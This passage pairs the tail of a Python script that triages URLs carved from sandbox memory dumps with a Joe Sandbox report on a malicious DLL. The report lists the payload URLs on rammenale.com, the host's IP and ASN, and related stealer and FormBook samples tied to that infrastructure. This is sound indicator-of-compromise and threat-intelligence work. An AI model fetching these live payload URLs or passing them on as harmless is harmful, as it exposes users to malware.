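@dataclass(frozen=True)
class Hit:
    url: str       # string exactly as carved from memory
    pct: int       # detection percentage reported by the scanner
    scanner: str
    label: str     # malware / safe, or 'Browse' (Virustotal link text)


def parse_row(row: str) -> Hit:
    """Split one fused row.  Avira reports exactly 100% for 'malware' and 0% for
    'safe'; the Virustotal rows here carry a single-digit percentage.  Anchoring
    on that resolves rows such as '...aclog.txt42100%' and '...//90%'."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    rest, scanner, label = m.group("rest", "scanner", "label")
    if scanner == "Avira URL Cloud":
        pct_text = "100%" if label == "malware" else "0%"
        if not rest.endswith(pct_text):
            raise ValueError(f"Avira label {label!r} without {pct_text}: {row!r}")
    else:
        d = re.search(r"\d%$", rest)
        if not d:
            raise ValueError(f"no percentage in: {row!r}")
        pct_text = d.group(0)
    url = rest[: -len(pct_text)]
    return Hit(url, int(pct_text[:-1]), scanner, label)


def canonical_url(url: str) -> tuple[str, str]:
    """Return (canonical URL, kind): 'file' when a known extension was found and
    the bytes after it dropped, 'directory' when only the prefix up to the last
    '/' is trustworthy (no extension, so the file name cannot be recovered)."""
    url = re.sub(r"(?<!:)/{2,}", "/", url)  # '//9' is a carved '/' plus junk, not a path
    m = EXT_RE.match(url)
    if m:
        return m.group(1), "file"
    return url[: url.rfind("/") + 1], "directory"


def triage(rows: list[str]) -> dict[str, dict]:
    """Group every row under its canonical URL with the verdicts seen for it."""
    summary: dict[str, dict] = {}
    for row in rows:
        hit = parse_row(row)
        canon, kind = canonical_url(hit.url)
        entry = summary.setdefault(canon, {"kind": kind, "variants": set(), "avira": set(), "vt_max_pct": 0})
        entry["variants"].add(hit.url)
        if hit.scanner == "Avira URL Cloud":
            entry["avira"].add(hit.label)
        else:
            entry["vt_max_pct"] = max(entry["vt_max_pct"], hit.pct)
    return summary


if __name__ == "__main__":
    for canon, info in sorted(triage(SAMPLE_ROWS).items()):
        print(f"{canon} [{info['kind']}] variants={len(info['variants'])} "
              f"avira={sorted(info['avira'])} vt_max={info['vt_max_pct']}%")
```

On the twelve sample rows this yields four canonical entries: the two payload URLs, the /for2/ directory (from the "aclog" and "aclogtxt" fragments, whose file name cannot be recovered) and the bare host. Run over the full table the picture is the same, which is the point: two URLs to block, not a hundred.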
Domain | IP | Active | Malicious | Antivirus detection | Reputation
rammenale.com | 131.153.206.231 | true | true | none listed | unknown

URL | Malicious | Antivirus detection | Reputation
https://rammenale.com/for2/regit.tmp | true | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt | true | Avira URL Cloud: malware | unknown
Name | Source (process, memory dump) | Malicious | Antivirus detection
Reputation is "unknown" for every entry where the page shows it, so that column is dropped below; "Browse" on the Virustotal entries is the report's link text. The dump identifier is the report's own (PID.run.timestamp.base address.flags.sdmp), kept verbatim so each string can be traced to its memory region.
https://rammenale.com/for2/regit.tmp$u | rundll32.exe, 00000008.00000002.3289370327.0000000008BE3000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtM | rundll32.exe, 00000005.00000002.3286428074.000000000317A000.00000004.00000020.00020000.00000000.sdmp | true | Virustotal 1%; Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpent | rundll32.exe, 00000007.00000002.3286915382.00000000028B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp | true | Virustotal 0%; Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtPR | rundll32.exe, 00000005.00000002.3287957318.00000000032C0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware
https://rammenale.com/for2/aclogY | rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpft | rundll32.exe, 00000007.00000002.3286915382.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp4kJ | rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp( | rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpPR5 | rundll32.exe, 00000007.00000002.3286295606.00000000026C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtT | rundll32.exe, 00000006.00000002.3286763260.0000000003289000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp) | rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/T | rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe
https://rammenale.com/for2/aclog.txtR | rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt42 | rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt6634-1003( | rundll32.exe, 0000000B.00000002.3289283250.0000000008C74000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp% | rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpry | rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtO | rundll32.exe, 00000005.00000002.3289519547.0000000008FA7000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtZ | rundll32.exe, 0000000B.00000002.3286397413.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt4? | rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txte | rundll32.exe, 00000006.00000002.3286763260.0000000003208000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: malware
https://rammenale.com/d | rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe
https://rammenale.com/for2/regit.tmpsC: | loaddll32.exe, 00000000.00000002.2078622698.0000000000B70000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt) | rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/k | rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe
https://rammenale.com/for2/aclog.txt4Y | rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtenth | rundll32.exe, 00000005.00000002.3286428074.0000000003170000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt4 | rundll32.exe, 0000000B.00000002.3289283250.0000000008D02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt4FA | rundll32.exe, 00000005.00000002.3289519547.0000000008F85000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt3 | rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286397413.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt0O | rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt0 | rundll32.exe, 00000006.00000002.3289715229.0000000008D34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/q | rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe
https://rammenale.com/for2/aclog | rundll32.exe, 0000000B.00000002.3288849622.0000000005132000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3288849622.000000000511A000.00000004.00000020.00020000.00000000.sdmp | true | Virustotal 0%; Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt: | rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpn | rundll32.exe, 00000008.00000002.3289370327.0000000008BFA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtF | rundll32.exe, 0000000B.00000002.3289283250.0000000008C74000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpw | rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpxe.muiE | rundll32.exe, 00000003.00000002.2054268818.0000000002A5A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpz | rundll32.exe, 00000007.00000002.3289414111.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmps | rundll32.exe, 00000008.00000002.3288087591.0000000003110000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3288019449.0000000002D40000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpC: | rundll32.exe, 00000003.00000002.2054157114.0000000002880000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2053873266.0000000000390000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3286915382.0000000002840000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3286404061.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286340448.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286449420.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286291304.0000000002990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AA0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpu | rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt6634-1003 | rundll32.exe, 00000005.00000002.3289519547.0000000008F42000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt? | rundll32.exe, 00000006.00000002.3289715229.0000000008D34000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/ | rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289577323.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe
https://rammenale.com/for2/regit.tmp8a5 | rundll32.exe, 00000007.00000002.3286915382.00000000028CE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt4u | rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp6634-1003 | rundll32.exe, 00000007.00000002.3289414111.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289370327.0000000008BE3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtry | rundll32.exe, 00000005.00000002.3289519547.0000000008F42000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtQw | rundll32.exe, 00000006.00000002.3289715229.0000000008D34000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtrw | rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpg | rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmph | rundll32.exe, 00000007.00000002.3289414111.0000000007B42000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt4n | rundll32.exe, 00000006.00000002.3289715229.0000000008CFD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt60 | rundll32.exe, 00000005.00000002.3286428074.000000000317A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtentindowsINetCookies | rundll32.exe, 00000006.00000002.3286763260.0000000003208000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt4r | rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp08 | rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpP | rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtfw | rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtC: | rundll32.exe, 00000005.00000002.3286428074.0000000003170000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3286258610.0000000003080000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286763260.0000000003190000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286367088.0000000002F90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286397413.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286293078.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt& | rundll32.exe, 00000006.00000002.3286763260.0000000003208000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt% | rundll32.exe, 00000005.00000002.3286428074.00000000031E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt4~ | rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpS | rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmp | false | none listed
https://rammenale.com/for2/aclog.txtft | rundll32.exe, 00000005.00000002.3286428074.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286397413.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpA | rundll32.exe, 0000000C.00000002.3289874951.000000000882B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtk | rundll32.exe, 00000005.00000002.3289519547.0000000008FA7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com//9 | rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe
https://rammenale.com/for2/regit.tmp; | rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txti | rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclogtxt | rundll32.exe, 00000005.00000002.3286153316.0000000003037000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286159157.0000000002B77000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286150447.0000000002B37000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtv | rundll32.exe, 00000005.00000002.3286428074.00000000031E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpG | rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmp | false | none listed
https://rammenale.com/6 | rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe
https://rammenale.com/for2/aclog.txtt | rundll32.exe, 00000005.00000002.3289519547.0000000008FA7000.00000004.00000020.00020000.00000000.sdmp | false | none listed
https://rammenale.com/for2/aclog.txts | rundll32.exe, 00000006.00000002.3286558558.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3287828894.0000000003280000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp4s5 | rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp0 | rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286449420.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpmp | rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp4X | rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtz | rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3289519547.0000000008F85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CFD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008D02000.00000004.00000020.00020000.00000000.sdmp | false | none listed
https://rammenale.com/for2/aclog.txtentdll8 | rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtx | rundll32.exe, 00000006.00000002.3286763260.0000000003190000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp7 | rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpc4u | rundll32.exe, 00000007.00000002.3289414111.0000000007B5C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp4Zfrh | rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txt4$ | rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtdT | rundll32.exe, 00000005.00000002.3289519547.0000000008F42000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp4 | rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmpuk | rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/aclog.txtentdll | rundll32.exe, 0000000B.00000002.3286397413.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
https://rammenale.com/for2/regit.tmp6 | rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
131.153.206.231 | rammenale.com | United States | 19437 | SS-ASHUS | true
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1500943
          Start date and time:2024-08-29 06:52:07 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 57s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:QEydjQdRxs.dll
          renamed because original name is a hash value
          Original Sample Name:b62c9168fcde444dbc3be1593e80747929dcf1a49cc6305b49456d68d0c49e71.dll
          Detection:MAL
          Classification:mal88.evad.winDLL@20/0@1/1
          EGA Information:
          • Successful, ratio: 40%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 15
          • Number of non-executed functions: 49
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target rundll32.exe, PID 1992 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 2148 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 7104 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
00:53:00 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
00:53:03 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
Match: 131.153.206.231
Associated Sample Name / URL | Detection | Threat Name
Dll1.dll | malicious | Unknown
Dll1.dll | malicious | Unknown

Match: rammenale.com
Associated Sample Name / URL | Detection | Threat Name | Context
Dll1.dll | malicious | Unknown | 131.153.206.231
Dll1.dll | malicious | Unknown | 131.153.206.231

Match: SS-ASHUS
Associated Sample Name / URL | Detection | Threat Name | Context
Dll1.dll | malicious | Unknown | 131.153.206.231
Dll1.dll | malicious | Unknown | 131.153.206.231
https://blockchainsolution.netlify.app/ | malicious | Unknown | 131.153.206.100
http://blockdag-network-rectification.pages.dev/wallet/inputs.html/js/aes.js | malicious | Unknown | 131.153.206.103
[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml | malicious | Unknown | 131.153.100.38
Bank Slip.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 131.153.147.106
Fatura20240617.exe | malicious | FormBook | 131.153.148.82
0tkRwEewXq.exe | malicious | FormBook | 131.153.170.234
CMgd5ZVG2N.elf | malicious | Unknown | 209.100.21.94
CMV610942X6UI.exe | malicious | FormBook | 131.153.148.82

Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Vidar | 131.153.206.231
rSHIPMENT_DOCMSS24071327.exe | malicious | FormBook, GuLoader | 131.153.206.231
file.exe | malicious | LummaC, Vidar | 131.153.206.231
file.exe | malicious | LummaC, Stealc, Vidar | 131.153.206.231
Dll1.dll | malicious | Unknown | 131.153.206.231
Dll1.dll | malicious | Unknown | 131.153.206.231
file.exe | malicious | LummaC, Vidar | 131.153.206.231
x64_installer__v4.5.6.msi | malicious | Unknown | 131.153.206.231
Ad#U043ebe_Activator.exe | malicious | LummaC | 131.153.206.231
file.exe | malicious | Meduza Stealer | 131.153.206.231
              No context
              No created / dropped files found
              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.525256862846471
